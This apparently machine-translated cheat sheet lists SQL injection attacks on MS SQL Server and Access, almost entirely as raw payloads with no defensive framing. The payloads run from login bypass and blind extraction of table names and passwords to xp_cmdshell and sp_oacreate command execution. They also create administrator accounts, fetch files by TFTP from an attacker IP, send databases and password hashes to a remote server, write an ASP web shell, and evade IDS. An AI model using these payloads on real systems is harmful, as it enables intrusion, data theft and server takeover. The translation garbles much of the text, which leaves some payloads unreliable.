A faulty statement: SQL = "select PWD, answer from [member] Where userid = '" & userid & "' and answer = '" & Answer &"'" You can also make such a low-level error. At this time, you only need to construct a special user name and password based on SQL, such as 'or '1' =' 1, a faulty statement: SQL = "select PWD, answer from [member] Where userid = '" & userid & "' and answer = '" & Answer &"'" This low-level error will also be made. At this time, you only need to construct a special user name and password based on SQL, such as: 'or '1' = '1 1. determine whether there are any injection points ; And 1 = 1 and 1 = 2 2. Generally, the name of a table is admin adminuser user pass password .. And 0 <> (select count (*) from *) And 0 <> (select count (*) from Admin) --- determine whether the admin table exists 3. If the number of accounts is 0, <return correct page 1 <return error page indicating that the number of accounts is 1 And 0 <(select count (*) from Admin) And 1 <(select count (*) from Admin) 4. Add the expected field name to the Len () brackets. And 1 = (select count (*) from Admin where Len (*)> 0 )-- And 1 = (select count (*) from Admin where Len (User field name)> 0) And 1 = (select count (*) from Admin where Len (_ blank> password field name password)> 0) 5. Guess the length of each field. The length of each field is changed to 0 until the correct page is returned. And 1 = (select count (*) from Admin where Len (*)> 0) And 1 = (select count (*) from Admin where Len (name)> 6) Error And 1 = (select count (*) from Admin where Len (name)> 5) the correct length is 6 And 1 = (select count (*) from Admin where Len (name) = 6) Correct And 1 = (select count (*) from Admin where Len (password)> 11) Correct And 1 = (select count (*) from Admin where Len (password)> 12) the error length is 12 And 1 = (select count (*) from Admin where Len (password) = 12) Correct 6. escape characters And 1 = (select count (*) from Admin where left (name, 1) = A) --- guesses the first place of the user account And 1 = (select count (*) from Admin where left (name, 2) = AB) --- second place of the user account In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out And 1 = (select top 1 count (*) from Admin where ASC (mid (Pass, 5, 1) = 51 )-- This query statement can be used to guess the chinese user and the _ blank> password. You only need to replace the following number with the Chinese assic code, and then convert the result to a character. Group by users. ID having 1 = 1 -- Group by users. ID, users. username, users. Password, users. privs having 1 = 1 -- ; Insert into users values (666, attacker, foobar, 0 xFFFF )-- Union select top 1 column_blank> _ name from information_blank> _ schema. columns where table_blank> _ name = logintable- Union select top 1 column_blank> _ name from information_blank> _ schema. columns where table_blank> _ name = logintable where column_blank> _ name not in (login_blank> _ id )- Union select top 1 column_blank> _ name from information_blank> _ schema. columns where table_blank> _ name = logintable where column_blank> _ name not in (login_blank> _ id, login_blank> _ name )- Union select top 1 login_blank> _ name from logintable- Union select top 1 password from logintable where login_blank> _ name = Rahul -- Check _ blank> server patch = SP4 patch hit Error And 1 = (select @ version )-- Check the permissions of the _ blank> database connection account. The returned result is normal, proving that the permissions are _ blank> SysAdmin permissions of the server role. And 1 = (select is_blank> _ srvrolemember (SysAdmin ))-- Determine the connection _ blank> database account. (Using the SA account for connection returns normal = proves that the connection account is SA) And SA = (select system_blank> _ User )-- And user_blank> _ name () = DBO -- And 0 <> (select user_blank> _ name ()-- Check whether xp_blank> _ empty shell is deleted. And 1 = (select count (*) from Master. DBO. sysobjects where xtype = x and name = xp_blank> _ empty shell )-- Xp_blank> _ restore shell is deleted and restored. It supports absolute path recovery. ; Exec master. DBO. sp_blank> _ addextendedproc xp_blank> _ mongoshell, xplog70.dll -- ; Exec master. DBO. sp_blank> _ addextendedproc xp_blank> _ empty shell, c: \ Inetpub \ wwwroot \ xplog70.dll -- Ping your own lab in reverse order ; Use master; declare @ s int; Exec sp_blank> _ oacreate "wscript. shell ", @ s out; Exec sp_blank> _ oamethod @ s," run ", null," cmd.exe/c Ping 192.168.0.1 ";-- Add account ; Declare @ shell int exec sp_blank> _ oacreate wscript. shell, @ shell output exec sp_blank> _ oamethod @ shell, run, null, c: \ winnt \ system32 \ cmd.exe/C net user jiaoniang $1866574/Add -- Create a virtual directory edisk: ; Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, null, cscript.exe c: \ Inetpub \ wwwroot \ mkwebdir. vbs-W "Default web site"-V "E", "E :\"-- Access attributes: (write a webshell together) Declare @ o int exec sp_blank> _ oacreate wscript. shell, @ o out exec sp_blank> _ oamethod @ o, run, null, cscript.exe c: \ Inetpub \ wwwroot \ chaccess. vbs-A w3svc/1/root/e + browse Tip: % 5c = \ or submit/and \ modify % 5 And 0 <> (select top 1 paths from newtable )-- Obtain the Database Name (from 1 to 5 is the System ID, more than 6 can be determined) And 1 = (Select name from Master. DBO. sysdatabases where dbid = 7 )-- And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6) Submit dbid =, 9... to get more _ blank> database names. and 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u) violent to a table is assumed to be admin and 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Admin) to obtain other tables. and 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = admin and uid> (STR (ID ))) assume that the value of the brute-force uid is 18779569 uid = ID and 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569) to obtain an admin field, which is assumed to be user_blank> _ id and 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569 and name not in (ID ,...)) to expose other fields and 0 <(select user_blank> _ id from BBS. DBO. admin Where username> 1) You can get the username , followed by _ blank> password ..... Assume that user_blank> _ id username, password, and other fields exist. And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6) And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = U) And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Address )) And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = admin and uid> (STR (ID) determine the id value And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 773577794) All fields ? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from Admin ? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from Admin (Union, access is also useful) Obtain the web path ; Create Table [DBO]. [swap] ([swappass] [char] (255 ));-- And (select top 1 swappass from SWAp) = 1 -- ; Create Table newtable (ID int identity (500), paths varchar () Declare @ test varchar (20) exec master .. xp_blank> _ regread @ rootkey = hkey_blank> _ local_blank> _ machine, @ key = System \ CurrentControlSet \ Services \ W3SVC \ Parameters \ virtual roots \, @ value_blank> _ name = /, values = @ test output insert into paths (PATH) values (@ test )-- ; Use ku1 ;-- ; Create Table cmd (STR image); -- create an image-type table cmd The test process of xp_blank> _ cmdshell exists: ; Exec master .. xp_blank> _ your shell dir ; Exec master. DBO. sp_blank> _ addlogin jiaoniang $; -- add an SQL account ; Exec master. DBO. sp_blank> _ password NULL, jiaoniang $, 1866574 ;-- ; Exec master. DBO. sp_blank> _ addsrvrolemember jiaoniang $ SysAdmin ;-- ; Exec master. DBO. xp_blank> _ your shell net user jiaoniang $1866574/workstations: */times: All/passwordchg: yes/passwordreq: yes/active: yes/Add ;-- ; Exec master. DBO. xp_blank> _ your shell net localgroup administrators jiaoniang $/Add ;-- Exec master.. xp_blank> _ servicecontrol start, schedule start _ blank> Service Exec master .. xp_blank> _ servicecontrol start, Server ; Declare @ shell int exec sp_blank> _ oacreate wscript. shell, @ shell output exec sp_blank> _ oamethod @ shell, run, null, c: \ winnt \ system32 \ cmd.exe/C net user jiaoniang $1866574/Add ; Declare @ shell int exec sp_blank> _ oacreate wscript. shell, @ shell output exec sp_blank> _ oamethod @ shell, run, null, c: \ winnt \ system32 \ cmd.exe/C net localgroup administrators jiaoniang $/Add ; Exec master.. xp_blank> _ using shell TFTP-I youip get file.exe -- use TFTP to upload files ; Declare @ A sysname set @ A = xp_blank> _ + your shell exec @ A dir c :\ ; Declare @ A sysname set @ A = XP + _ blank> _ cm '+ 'dshell exec @ A dir c :\ ; Declare @ A; Set @ A = db_blank> _ name (); backup database @ A to disk = your IP address your shared directory Bak. dat If it is restricted, you can. Select * From OpenRowSet (_ blank> sqloledb, server; SA;, select OK! Exec master. DBO. sp_blank> _ addlogin Hax) Query structure: Select * from news where id =... and topic =... and ..... Adminand 1 = (select count (*) from [user] Where username = victim and right (left (userpass, 01), 1) = 1) and userpass <> Select 123 ;-- ; Use master ;-- : A or name like fff %; -- displays a user named FFFF. And 1 <> (select count (email) from [user]); -- ; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and status> 0) Where name = FFFF ;-- ; Update [users] Set email = (select top 1 ID from sysobjects where xtype = u and name = AD) Where name = FFFF ;-- ; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and ID> 581577110) Where name = FFFF ;-- ; Update [users] Set email = (select top 1 count (ID) from password) Where name = FFFF ;-- ; Update [users] Set email = (select top 1 PWD from password where id = 2) Where name = FFFF ;-- ; Update [users] Set email = (select top 1 name from password where id = 2) Where name = FFFF ;-- The above statement is to get the first user table in the _ blank> database, and put the table name in the FFFF user's mailbox field. By viewing FFFF user information, you can obtain the first table named ad. Then, the ID of the table is obtained based on the table name ad. The name of the second table is obtained. insert into users values (666, char (0x63) + char (0x68) + char (0x72) + char (0x69) + char (0x73), char (0x63) + char (0x68) + char (0x72) + char (0x69) + char (0x73), 0 xFFFF) -- insert into users values (667,123,123, 0 xFFFF) -- insert into users values (123, admin --, password, 0 xFFFF) -- ; and user> 0 ; and (select count (*) from sysobjects)> 0 ; and (select count (*) from mysysobjects)> 0 // access_blank> database name of the data table ; update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 ); -- This is to update the first table name to the AAA field. read the first table and the second table can be read as follows (ADD and name after the condition <> name of the table just obtained ). ; update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 and name <> vote ); -- then Id = 1552 and exists (select * from AAA where AAA> 5) read the second table one by one until it does not exist. the read field is as follows: ; update AAA set AAA = (select top 1 col_blank> _ name (object_blank> _ ID (table name), 1 )); -- then Id = 152 and exists (select * from AAA where AAA> 5) error, get field name ; update AAA set AAA = (select top 1 col_blank> _ name (object_blank> _ ID (table name), 2 )); -- then Id = 152 and exists (select * from AAA where AAA> 5) error, get field name [Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name] Update table name set field = (select top 1 name from sysobjects where xtype = u and status> 0 [and name <> Add one to the table name you get]) [Where condition] Select top 1 name from sysobjects where xtype = u and status> 0 and name not in (Table1, Table2 ,...) Through sqlserver injection _ blank> vulnerability creation _ blank> Database Administrator Account and System Administrator account [the current account must be a SysAdmin Group] [Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name] Update table name set field = (select top 1 col_blank> _ name (object_blank> _ ID (name of the data table to be queried), field column for example: 1) [Where condition] Bypassing IDS detection [using variables] ; Declare @ A sysname set @ A = xp_blank> _ + your shell exec @ A dir c :\ ; Declare @ A sysname set @ A = XP + _ blank> _ cm '+ 'dshell exec @ A dir c :\ 1. enable remote _ blank> Database Basic syntax Select * From OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1) Parameter: (1) oledb provider name 2. The connection string parameter can be any port used for connection, for example Select * From OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from table 3. Copy the entire _ blank> database insert all remote tables of the target host to the local table. Basic Syntax: Insert into OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1) Select * From Table2 This line of statements copies all the data in table 2 on the target host to table 1 in the remote _ blank> database. In actual use, modify the IP address and port of the connection string to point to the desired location, for example: Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1) Select * From Table2 Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From _ blank> _ sysdatabases) Select * from Master. DBO. sysdatabases Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From _ blank> _ sysobjects) Select * From user_blank> _ database. DBO. sysobjects Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From _ blank> _ syscolumns) Select * From user_blank> _ database. DBO. syscolumns Copy _ blank> database: Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1) Select * from database .. Table1 Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From table2) Select * from database .. Table2 Copy the hash table (hash) logon _ blank> password hash and store it in sysxlogins. The method is as follows: Insert into OpenRowSet (sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From _ blank> _ sysxlogins) Select * from database. DBO. sysxlogins After obtaining the hash, you can perform brute-force cracking. To traverse the directory, create a temporary table: temp. ; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));-- ; Insert temp exec master. DBO. xp_blank> _ availablemedia; -- get all current drives ; Insert into temp (ID) exec master. DBO. xp_blank> _ subdirs c: \; -- get the subdirectory list ; Insert into temp (ID, num1) exec master. DBO. xp_blank> _ dirtree c: \; -- get the directory tree structure of all subdirectories and import them to the temp table. ; Insert into temp (ID) exec master. DBO. xp_blank> _ your shell Type C: \ WEB \ index. asp; -- view the content of a file ; Insert into temp (ID) exec master. DBO. xp_blank> _ your shell dir c :\;-- ; Insert into temp (ID) exec master. DBO. xp_blank> _ your shell dir c: \ *. asp/S/;-- ; Insert into temp (ID) exec master. DBO. xp_blank> _ Empty Shell cscript c: \ Inetpub \ adminscripts \ adsutil. vbs Enum w3svc ; Insert into temp (ID, num1) exec master. DBO. xp_blank> _ dirtree c: \; -- (xp_blank> _ dirtree permission Public) Write table: Statement 1: And 1 = (select is_blank> _ srvrolemember (SysAdmin ));-- Statement 2: And 1 = (select is_blank> _ srvrolemember (serveradmin ));-- Statement 3: And 1 = (select is_blank> _ srvrolemember (setupadmin ));-- Statement 4: and 1 = (select is_blank> _ srvrolemember (securityadmin ));-- Statement 5: and 1 = (select is_blank> _ srvrolemember (securityadmin ));-- Statement 6: and 1 = (select is_blank> _ srvrolemember (diskadmin ));-- Statement 7: and 1 = (select is_blank> _ srvrolemember (bulkadmin ));-- Statement 8: and 1 = (select is_blank> _ srvrolemember (bulkadmin ));-- Statement 9: and 1 = (select is_blank> _ member (db_blank> _ owner ));-- Write the path to the table: ; Create Table dirs (paths varchar (100), Id INT )-- ; Insert dirs exec master. DBO. xp_blank> _ dirtree c :\-- And 0 <> (select top 1 paths from dirs )-- And 0 <> (select top 1 paths from dirs where paths not in (@ inetpub ))-- ; Create Table dirs1 (paths varchar (100), Id INT )-- ; Insert dirs exec master. DBO. xp_blank> _ dirtree E: \ Web -- And 0 <> (select top 1 paths from dirs1 )-- Back up the _ blank> database to the webpage Directory: Download ; Declare @ A sysname; Set @ A = db_blank> _ name (); backup database @ A to disk = E: \ WEB \ down. bak ;-- And 1 = (select top 1 name from (select Top 12 ID, name from sysobjects where xtype = char (85) T order by id desc) And 1 = (select top 1 col_blank> _ name (object_blank> _ ID (user_blank> _ login), 1) from sysobjects) See related tables. And 1 = (select user_blank> _ id from user_blank> _ login) And 0 = (Select User From user_blank> _ login where user> 1) -=-Wscript. Shell example-=- Declare @ o int Exec sp_blank> _ oacreate wscript. Shell, @ o out Exec sp_blank> _ oamethod @ o, run, null, notepad.exe ; Declare @ o int exec sp_blank> _ oacreate wscript. Shell, @ o out exec sp_blank> _ oamethod @ o, run, null, notepad.exe -- Declare @ o int, @ F int, @ t int, @ RET int Declare @ line varchar (8000) Exec sp_blank> _ oacreate scripting. FileSystemObject, @ o out Exec sp_blank> _ oamethod @ o, opentextfile, @ F out, c: \ Boot. ini, 1 Exec @ ret = sp_blank> _ oamethod @ F, Readline, @ line out While (@ ret = 0) Begin Print @ line Exec @ ret = sp_blank> _ oamethod @ F, Readline, @ line out End Declare @ o int, @ F int, @ t int, @ RET int Exec sp_blank> _ oacreate scripting. FileSystemObject, @ o out Exec sp_blank> _ oamethod @ o, createtextfile, @ F out, c: \ Inetpub \ wwwroot \ Foo. asp, 1 Exec @ ret = sp_blank> _ oamethod @ F, writeline, null, <% Set O = server. Createobject ("wscript. Shell"): O. Run (request. querystring ("cmd") %> Declare @ o int, @ RET int Exec sp_blank> _ oacreate speech. voicetext, @ o out Exec sp_blank> _ oamethod @ o, register, null, Foo, bar Exec sp_blank> _ oasetproperty @ o, speed, 150 Exec sp_blank> _ oamethod @ o, speak, null, all your sequel servers are belong to, US, 528 Waitfor delay 00:00:05 ; Declare @ o int, @ RET int exec sp_blank> _ oacreate speech. voicetext, @ o out exec sp_blank> _ oamethod @ o, register, null, Foo, bar exec sp_blank> _ oasetproperty @ o, speed, 150 exec sp_blank> _ oamethod @ O, speak, null, all your sequel servers are belong to us, 528 waitfor delay 00:00:05 -- Xp_blank> _ dirtree permission public Exec master. DBO. xp_blank> _ dirtree c :\ The returned information includes two fields subdirectory and depth. The subdirectory field is the accept type, and the depth field is the integer field. Create Table dirs (paths varchar (100), Id INT) Create a table. The table created here is connected to xp_blank> _ dirtree. The fields are equal and the types are the same. Insert dirs exec master. DBO. xp_blank> _ dirtree c :\ As long as the table creation definition is equal to the field returned by the storage process, it can be executed! To write the table, step by step to achieve the information we want |